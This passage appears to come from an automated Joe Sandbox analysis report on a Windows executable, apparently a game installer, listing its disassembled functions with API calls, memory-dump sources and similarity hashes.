                                                                                                                                              • LCMapStringW.KERNEL32(00000000,00000100,0044D18C,00000001,00000000,00000000,0044EA50,00000038,004275F5,000000FF,00000200,?,00000002,?,00000002,?), ref: 00430BE7
                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,000000FF,00419BB0,?,?), ref: 00430BF9
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0044EA50,00000038,004275F5,000000FF,00000200,?,00000002,?,00000002,?), ref: 00430C80
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,?,000000FF,00419BB0,?,?), ref: 00430D01
                                                                                                                                              • LCMapStringW.KERNEL32(00000010,?,?,00000000,00000000,00000000,?,00000000,?,000000FF,00419BB0,?,?), ref: 00430D1B
                                                                                                                                              • LCMapStringW.KERNEL32(00000010,?,?,00000000,?,?,?,00000000,?,000000FF,00419BB0,?,?), ref: 00430D56
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: String$ByteCharMultiWide$ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1775797328-0
                                                                                                                                              • Opcode ID: d8a76754379fe254c5ee1d4274d7db85904f9d2338a9600fb25799d2cf117cde
                                                                                                                                              • Instruction ID: aa89c333057c4e435e6b64ceb4fb56c1cd3fb09bfbed1fcd7610a6d3c1857a38
                                                                                                                                              • Opcode Fuzzy Hash: d8a76754379fe254c5ee1d4274d7db85904f9d2338a9600fb25799d2cf117cde
                                                                                                                                              • Instruction Fuzzy Hash: C1B1A9B2800119EFCF219FA4DC958EE7BB5FF0C314F10562AFA11A2260D73989A1DB59
                                                                                                                                              Function 00436495 Relevance: 16.6, APIs: 11, Instructions: 120COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 0043649A
                                                                                                                                              • FindResourceA.KERNEL32(?,00000000,00000005), ref: 004364D2
                                                                                                                                              • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 004364DA
                                                                                                                                                • Part of subcall function 00438DD6: UnhookWindowsHookEx.USER32(?), ref: 00438DFB
                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 004364EC
                                                                                                                                              • GetDesktopWindow.USER32 ref: 00436519
                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00436527
                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00436536
                                                                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 004365C5
                                                                                                                                              • GetActiveWindow.USER32 ref: 004365D0
                                                                                                                                              • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004365DE
                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004365FA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 833315621-0
                                                                                                                                              • Opcode ID: e199c737b50d517b0b306a191cb206ffac98a79345493696f53003073e33933f
                                                                                                                                              • Instruction ID: f6843848d02d9acbe4f9de89053a38c821629bc9e9d675896fa0d8a5ac17685f
                                                                                                                                              • Opcode Fuzzy Hash: e199c737b50d517b0b306a191cb206ffac98a79345493696f53003073e33933f
                                                                                                                                              • Instruction Fuzzy Hash: C741D030900706FFCF21AFA5E84976EBBB5BF09715F11403EF501A22A1CB785A41CA5E
                                                                                                                                              Function 00413C4D Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 158registryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(0040476A), ref: 00413C4F
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,Programs,00000000,?,0045DF18,?), ref: 00413C6F
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00413C76
                                                                                                                                              • _strrchr.LIBCMT ref: 00413D9B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseOpenQueryValue_strrchr
                                                                                                                                              • String ID: Desktop$Programs$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Startup$\
                                                                                                                                              • API String ID: 2924401097-2691228934
                                                                                                                                              • Opcode ID: 0451721ad7b7bfeab725ab4e83a88f08b5d70f3a35907e647927684d4f7ca702
                                                                                                                                              • Instruction ID: 758c6f36c939e7f1c2052588e335acff266e04ba565fef884f1b9ab40d81982e
                                                                                                                                              • Opcode Fuzzy Hash: 0451721ad7b7bfeab725ab4e83a88f08b5d70f3a35907e647927684d4f7ca702
                                                                                                                                              • Instruction Fuzzy Hash: 5B511730208341AEE314CF25DC51FEB7BD45F95B06F14484DF9C497282EAB8E648C76A
                                                                                                                                              Function 004431A6 Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,004436E2,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 004431B7
                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,0047EB48,?,?,?,?,?,?,004436E2,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 00443208
                                                                                                                                              • GlobalHandle.KERNEL32(?), ref: 00443211
                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0044321B
                                                                                                                                              • GlobalReAlloc.KERNEL32(?,0047EB48,00002002), ref: 0044322F
                                                                                                                                              • GlobalHandle.KERNEL32(?), ref: 00443241
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00443248
                                                                                                                                              • LeaveCriticalSection.KERNEL32(0047EB28,?,?,?,?,?,?,004436E2,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 00443251
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0044325D
                                                                                                                                              • LeaveCriticalSection.KERNEL32(0047EB28), ref: 004432A5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2667261700-0
                                                                                                                                              • Opcode ID: 3551d93637448cf2e120c907dbe145befb04d6cacd3523446f38783358951b8d
                                                                                                                                              • Instruction ID: b0708ac090b4c07532e2f73ad039cb67d6ce4f3aec897b0794ea91f6c69e5c79
                                                                                                                                              • Opcode Fuzzy Hash: 3551d93637448cf2e120c907dbe145befb04d6cacd3523446f38783358951b8d
                                                                                                                                              • Instruction Fuzzy Hash: 0A31AB74600704AFEB20CF74CC48A5ABBF9FF86746B014A6EE852C3620DB75EA00CB54
                                                                                                                                              Function 00437850 Relevance: 15.1, APIs: 10, Instructions: 81stringregistryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 00437855
                                                                                                                                              • GetClassInfoA.USER32(?,?,?), ref: 00437870
                                                                                                                                              • RegisterClassA.USER32(?), ref: 00437883
                                                                                                                                              • lstrlenA.KERNEL32(-00000034,00000001), ref: 004378BF
                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 004378C6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Classlstrlen$H_prologInfoRegister
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3690589370-0
                                                                                                                                              • Opcode ID: b7666c6804b7a4e1af4ad46b385648ce39fa1e020673036b6e24608731eaa827
                                                                                                                                              • Instruction ID: d06448f70216e37ad6dd6e7a27fae02cd191811b199e5e129bd5a26421677b7e
                                                                                                                                              • Opcode Fuzzy Hash: b7666c6804b7a4e1af4ad46b385648ce39fa1e020673036b6e24608731eaa827
                                                                                                                                              • Instruction Fuzzy Hash: 2431F7B1904109FFDF11AFA0CD05BAEBFB4FF09315F004126F845A2251C7389A11DB99
                                                                                                                                              Function 00436288 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 0043628D
                                                                                                                                              • GetSystemMetrics.USER32(0000002A), ref: 00436351
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004363BC
                                                                                                                                              • CreateDialogIndirectParamA.USER32(?,?,?,00435D22,00000000), ref: 004363EB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                                                                                                                              • String ID: MS Shell Dlg
                                                                                                                                              • API String ID: 2364537584-76309092
                                                                                                                                              • Opcode ID: 99dbcdcf67a2fa19b37189b7afad9b74a6c17b04bf948d761a6e24d7af02056e
                                                                                                                                              • Instruction ID: 760bf385a5f842c8bc42ff6da57cfb0a7f61815e02265039a4cce4437fa5ada3
                                                                                                                                              • Opcode Fuzzy Hash: 99dbcdcf67a2fa19b37189b7afad9b74a6c17b04bf948d761a6e24d7af02056e
                                                                                                                                              • Instruction Fuzzy Hash: 4951C230D00206AFCF10EFA4C8859EEBBB5EF49314F15966EF812E7291D7388944CB99
                                                                                                                                              Function 0040C530 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 169COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 0040C539
                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,00000000,00000000), ref: 0040C595
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectoryHandleModule
                                                                                                                                              • String ID: %s\AutoRun$%s\DirectX$%s\Support$1.0$EA Game$Electronic Arts
                                                                                                                                              • API String ID: 1119135582-703046973
                                                                                                                                              • Opcode ID: 5b90b398e6f57ffb548b6c37434c464d42cee5ee5af4ff8ab7da3a7af927fe98
                                                                                                                                              • Instruction ID: 2134d4b6efddb0738bd5c58a3c99903547b8c6aa91fdd798fafc08fe3100bd3d
                                                                                                                                              • Opcode Fuzzy Hash: 5b90b398e6f57ffb548b6c37434c464d42cee5ee5af4ff8ab7da3a7af927fe98
                                                                                                                                              • Instruction Fuzzy Hash: 0A71C675209B40DFC325DF39D8949D7BBE9AF9A304B04486EE4AE83341DB347609CB69
                                                                                                                                              Function 0040A209 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 103filesleepCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064,?,?,?,00000000,00000001), ref: 0040A2E1
                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0040A2EF
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040A2FB
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040A30A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
